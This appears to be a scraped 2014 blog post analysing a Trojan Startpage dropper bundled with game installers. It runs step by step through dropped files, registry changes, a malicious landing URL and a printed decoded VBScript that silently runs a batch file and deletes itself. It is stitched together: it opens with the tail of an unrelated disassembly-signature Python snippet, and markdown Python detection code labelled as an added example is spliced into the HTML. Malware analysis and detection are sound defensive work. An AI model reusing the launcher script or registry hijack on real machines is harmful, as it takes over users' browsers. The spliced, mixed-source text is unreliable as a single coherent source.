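    return hashlib.sha256(" ".join(mnemonics(instructions)).encode()).hexdigest()


def similarity(a, b):
    """Ratio in [0, 1] of shared mnemonic sequence between two normalised listings."""
    return SequenceMatcher(None, mnemonics(a), mnemonics(b)).ratio()


if __name__ == "__main__":
    ins, labels = normalise(LISTING)
    print("\n".join(ins))
    print("labels:", labels)
    print("signature:", signature(ins))
```

The mnemonic-only signature deliberately ignores operands, which is what survives recompilation with different addresses; the full normalised instruction strings keep operands for a closer comparison when a candidate match (such as the Catchy32 source above) is at hand.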
Author: Anonymous (http://www.blogger.com/profile/06438364220975927250)

A Trojan Startpage Bundled Promo (published 2014-05-01, updated 2014-05-26)<div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Trojan Startpage is a type of trojan that forcefully changes the default start page of a web browser.</span></b></div>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit;"><span style="font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">This version of Startpage, found in the wild in early December 2013, is particularly interesting. Unlike its predecessors, which used the registry hack</span> <span style="background-color: #f9f9f9; color: #333333; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] “Start Page”</span> <span style="font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">to change the start page of Internet Explorer, this one uses a modified antivirus component to alter the browser's start page. Alongside the modified antivirus software, this version also bundles a number of non-malicious game downloaders together with the trojan (hence the title) in an NSIS</span> <span style="background-color: white; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">(Nullsoft Scriptable Install System)</span> <span style="font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">installer, in an attempt to hide its execution from the user.</span></span></b></div>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">A step-by-step account of how this trojan operates follows.</span></b></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b></div>
<div>
<ol style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates the %PROGRAMFILES%\rayying directory.</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1iQbccFQHSlTSCIFhCCdqcV1ra4DMqaa5zX_gLvNgiGKsK9aOTjyBb7_MOgX9JyBpd3eNvMd6cfXByoDqKMqSzsubyvYYj3cf2neLSKY4OILngGcCehXfTqLr7dSKmMq1PTu7F38S/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1iQbccFQHSlTSCIFhCCdqcV1ra4DMqaa5zX_gLvNgiGKsK9aOTjyBb7_MOgX9JyBpd3eNvMd6cfXByoDqKMqSzsubyvYYj3cf2neLSKY4OILngGcCehXfTqLr7dSKmMq1PTu7F38S/s1600/1.png" height="93" width="320" /></span></a></b></div>
</li>
</ol>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates “%ALLUSERSPROFILE%\Desktop\ Intornat Explarer .lnk”, a shortcut to rayying.exe. Rayying.exe is a Chinese web browser and is not malicious.</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSBJuW2mQ38r47cNrnFQQ3TxyVg-_Wez4CTHRiwsIZVhOmijOE44qR2EHnbLstPkULWY2V_WQwC_rWXbzrrax16hBTqz_sBJRWnmuUqmlyEX7Hh40d-n9Mi2CItfzrveD2KiJ4fzUP/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSBJuW2mQ38r47cNrnFQQ3TxyVg-_Wez4CTHRiwsIZVhOmijOE44qR2EHnbLstPkULWY2V_WQwC_rWXbzrrax16hBTqz_sBJRWnmuUqmlyEX7Hh40d-n9Mi2CItfzrveD2KiJ4fzUP/s1600/2.png" height="201" width="320" /></span></a></b></div>
</li>
</ol>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates a Quick Launch icon for rayying.exe in “%APPDATA%\Microsoft\Internet Explorer\Quick Launch”, again using Intornat Explorer as the shortcut name.</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyZ1frSMxHpstTMjJ6HHsBA4YJV_RdHGweidB0o-YYe5LCMQXEesWhAZWxqqnoOYizpy8FW3gBbN-AE7hSTLhsbNHuwWGUNB1odp5pS_Db0Hud2qCguMlmVRdyU_hp95sEyd64iLNR/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyZ1frSMxHpstTMjJ6HHsBA4YJV_RdHGweidB0o-YYe5LCMQXEesWhAZWxqqnoOYizpy8FW3gBbN-AE7hSTLhsbNHuwWGUNB1odp5pS_Db0Hud2qCguMlmVRdyU_hp95sEyd64iLNR/s1600/3.png" height="58" width="320" /></span></a></b></div>
</li>
</ol>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates the directory %PROGRAMFILES%\soft275710 and drops the following files:</span></b></div>
</li>
</ol>
<ul style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">300.bat - imports the 300.reg file and forcibly restarts the explorer.exe process</span></b></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">300.reg - adds "Attributes"=dword:0133EC20 to the registry keys of several Explorer shell objects, such as:</span></div>
</li>
<span style="font-family: inherit;">
<li style="display: inline; list-style: none;"><ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-size: 15px; list-style: circle; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="vertical-align: baseline; white-space: pre-wrap;">Default Navigator (</span><span style="background-color: white; color: #111111; vertical-align: baseline; white-space: pre-wrap;">{871C5380-42A0-1069-A2EA-08002B30309D})</span></div>
</li>
<li dir="ltr" style="background-color: white; color: #111111; font-size: 15px; list-style: circle; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="vertical-align: baseline; white-space: pre-wrap;">Computer Search Results folder ({1F4DE370-D627-11D1-BA4F-00A0C91EEDBA})</span></div>
</li>
<li dir="ltr" style="background-color: white; color: #111111; font-size: 15px; list-style: circle; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="vertical-align: baseline; white-space: pre-wrap;">Network Search Results ({E17D4FC0-5564-11D1-83F2-00A0C90DC849})</span></div>
</li>
</ul>
</li>
</span>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">275710.txt - a non-malicious txt file</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">b_2710.vbe - an encoded VBScript that executes 300.bat</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">w_2710.exe - an NSIS-compiled dropper/installer for smes.exe (this NSIS installer is the trojan component responsible for modifying the start page of web browsers)</span></div>
</li>
</ul>
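<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">The "Attributes" writes made by 300.reg and the older Start Page hack both leave a concrete registry artefact, so they are worth checking for in a .reg export or a registry diff. The Python below is an added example, not code from this post: it parses a .reg file and reports Attributes changes on the ShellFolder keys of the CLSIDs listed above, plus any Start Page value under Internet Explorer\Main. The sample .reg is constructed for the example; the post does not give 300.reg's exact key paths, so the CLSID\{...}\ShellFolder placement and the start-page URL are assumptions.</div>

```python
"""Flag registry artefacts of the Startpage chain in a .reg export.

Added example, not code from the post.  The CLSIDs and their names come from
the post; SAMPLE_REG is constructed and its key paths are assumptions.
"""
import re

# CLSIDs named in the post as targets of 300.reg
KNOWN_SHELL_CLSIDS = {
    "{871C5380-42A0-1069-A2EA-08002B30309D}": "Default Navigator",
    "{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}": "Computer Search Results folder",
    "{E17D4FC0-5564-11D1-83F2-00A0C90DC849}": "Network Search Results",
}

# Constructed sample modelled on the post's description of 300.reg.  The
# ...\ShellFolder subkey placement and the start-page URL are assumptions.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder]
"Attributes"=dword:0133EC20

[HKEY_CLASSES_ROOT\CLSID\{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}\ShellFolder]
"Attributes"=dword:0133EC20

[HKEY_CLASSES_ROOT\CLSID\{E17D4FC0-5564-11D1-83F2-00A0C90DC849}\ShellFolder]
"Attributes"=dword:0133EC20

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://start-page.example.invalid/"
"""

VALUE_RE = re.compile(r'^("(?:[^"\\]|\\.)*"|@)=(.*)$')
SHELLFOLDER_RE = re.compile(r"\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\ShellFolder$")


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: (kind, data)}}.

    Handles dword: and quoted string values; anything else is kept raw.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
        data = m.group(2)
        if data.lower().startswith("dword:"):
            keys[current][name] = ("dword", int(data[6:], 16))
        elif len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            # .reg strings escape backslash and double quote with a backslash
            keys[current][name] = ("string", re.sub(r'\\(["\\])', r"\1", data[1:-1]))
        else:
            keys[current][name] = ("other", data)
    return keys


def find_startpage_artifacts(reg_text):
    """Return a list of findings, one per suspicious key, in file order."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        m = SHELLFOLDER_RE.search(key)
        if m and "Attributes" in values:
            kind, data = values["Attributes"]
            clsid = m.group(1).upper()
            findings.append({
                "indicator": "shellfolder-attributes",
                "key": key,
                "clsid": clsid,
                "name": KNOWN_SHELL_CLSIDS.get(clsid, "unknown CLSID"),
                "value": "0x%08X" % data if kind == "dword" else str(data),
            })
        if key.lower().endswith(r"\software\microsoft\internet explorer\main") \
                and "Start Page" in values:
            findings.append({
                "indicator": "ie-start-page",
                "key": key,
                "value": values["Start Page"][1],
            })
    return findings


if __name__ == "__main__":
    for f in find_startpage_artifacts(SAMPLE_REG):
        print(f["indicator"], f.get("name", ""), f["value"])
```

Run against a real export (regedit's "Export" of HKCR\CLSID or of the user hive), an unknown CLSID with an Attributes write is still reported, tagged "unknown CLSID", so the check is not limited to the three objects this sample touched.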
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The encoded VBScript (b_2710.vbe) can be decoded with the tool at http://www.greymagic.com/security/tools/decoder/.</span></div>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here is the decoded version of the script:</span></div>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">'1020111003101004571027101010</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Dim WSHShell</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Set WshShell = WScript.CreateObject("WScript.Shell")</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">strDesktop = WshShell.SpecialFolders("Desktop") :'special folder "Desktop"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Favorites = WshShell.SpecialFolders("Favorites") :'special folder "Desktop"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">on error resume next</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">strttWinDir = WshShell.ExpandEnvironmentStrings("%ProgramFiles%")</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">createobject("wscript.shell").run """300.bat""",0</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Dim fso</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Set fso =CreateObject("Scripting.FileSystemObject")</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">fso.DeleteFile WScript.ScriptFullName</span></div>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Runs Internet Explorer with the address “http://www.qq937.com/yxyz/cp12/index.html?cid=50789”. While this site loads, the trojan continues its malicious activity in the background, unnoticed by the user.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZYt6OCzlZIGH2fIXcVG6vOPRvYDYx-oC9Z-hCGQx8awG8SF-zNsicSjcq6FkcImghC0kXcanVvU4tcgl9AUNLfMKg18KW5-PBqeXn6OcI4-4c2SKHI_0GbIrCTql3sNaFZQ1tbTd/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZYt6OCzlZIGH2fIXcVG6vOPRvYDYx-oC9Z-hCGQx8awG8SF-zNsicSjcq6FkcImghC0kXcanVvU4tcgl9AUNLfMKg18KW5-PBqeXn6OcI4-4c2SKHI_0GbIrCTql3sNaFZQ1tbTd/s1600/4.png" height="159" width="320" /></span></a></div>
</li>
</ol>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<ol start="6" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">The trojan then attempts to execute</span> <span style="font-style: italic; vertical-align: baseline; white-space: pre-wrap;">b_2710.vbe</span> <span style="vertical-align: baseline; white-space: pre-wrap;">but, since this VBScript is still encoded, the operating system just returns an error. At this point the trojan's infection routine is halted and continues only once the user closes the error message. This flaw was possibly introduced unintentionally by the malware author.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho3GGXe1uOtfqz-R-VyqGLmCwYJI8I2J3tW8pc4am0haQ_KykQl3sXkoY1GPU7OulzXYYS8SSzf2aRNSwLafXHGTaNhpbknNxopxv1-W_Z6Z9gkETD5k5QAQXSSvW3rSVbamx6TsSq/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho3GGXe1uOtfqz-R-VyqGLmCwYJI8I2J3tW8pc4am0haQ_KykQl3sXkoY1GPU7OulzXYYS8SSzf2aRNSwLafXHGTaNhpbknNxopxv1-W_Z6Z9gkETD5k5QAQXSSvW3rSVbamx6TsSq/s1600/5.png" /></span></a></div>
</li>
</ol>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<ol start="7" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Attempts to download and execute other components.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaxgtK7nVV2J-U1J5UbMwoiXzfzCPLOr6CJRxjf7Ob5Mv85QSwF-l7HAW_dOVfshL-JdGZLz0qktcA9L_H39kawyAmRiqaK1LAPRkvAz4wLfdtOoUeOz4vg4IZ3KIKcjmY1RvkwhHT/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaxgtK7nVV2J-U1J5UbMwoiXzfzCPLOr6CJRxjf7Ob5Mv85QSwF-l7HAW_dOVfshL-JdGZLz0qktcA9L_H39kawyAmRiqaK1LAPRkvAz4wLfdtOoUeOz4vg4IZ3KIKcjmY1RvkwhHT/s1600/6.png" height="59" width="320" /></span></a></div>
</li>
</ol>
<ol start="8" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">Executes the downloaded file %PROGRAMFILES%\soft275710\wl06079.exe, detected by VIPRE as</span> <span style="background-color: #f9f9f9; color: #b40c1a; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Trojan.Win32.Generic!BT</span></span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">Executes %PROGRAMFILES%\soft275710\w_2710.exe (which installs smes.exe), detected by VIPRE as</span> <span style="background-color: white; color: #b40c1a; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Trojan.NSIS.Startpage.aen (v)</span></span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Executes the downloaded file %PROGRAMFILES%\soft275710\JJmatch_11494.exe, a non-malicious game installer</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Executes the downloaded file %PROGRAMFILES%\soft275710\pipi_dae_381.exe, a non-malicious game installer</span></div>
</li>
</ol>
<div style="orphans: 2; widows: 2;">
<span style="font-family: inherit; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
</div>
</div>
<div style="orphans: 2; widows: 2;">
<h3 style="-webkit-text-stroke-width: 0px; color: black; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: inherit; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">An In-Depth Analysis of w_2710.exe - Trojan.NSIS.Startpage.aen (v)</span></h3>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The file w_2710.exe, which came bundled with the other software in the NSIS installer, is itself an NSIS installer. Executing w_2710.exe creates two new directories under %ALLUSERSPROFILE%\Application Data: “kingsoft\kws” and “smes”.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In the %ALLUSERSPROFILE%\Application Data\kingsoft\kws directory, the following files are added:</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kws.ini</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">spitesp.dat</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">spot.ini</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">In the %ALLUSERSPROFILE%\Application Data\smes directory, the following files are added:</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">smes.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kswbc.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kswebshield.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kwssp.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kwsui.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">u.bat</span></div>
</li>
</ul>
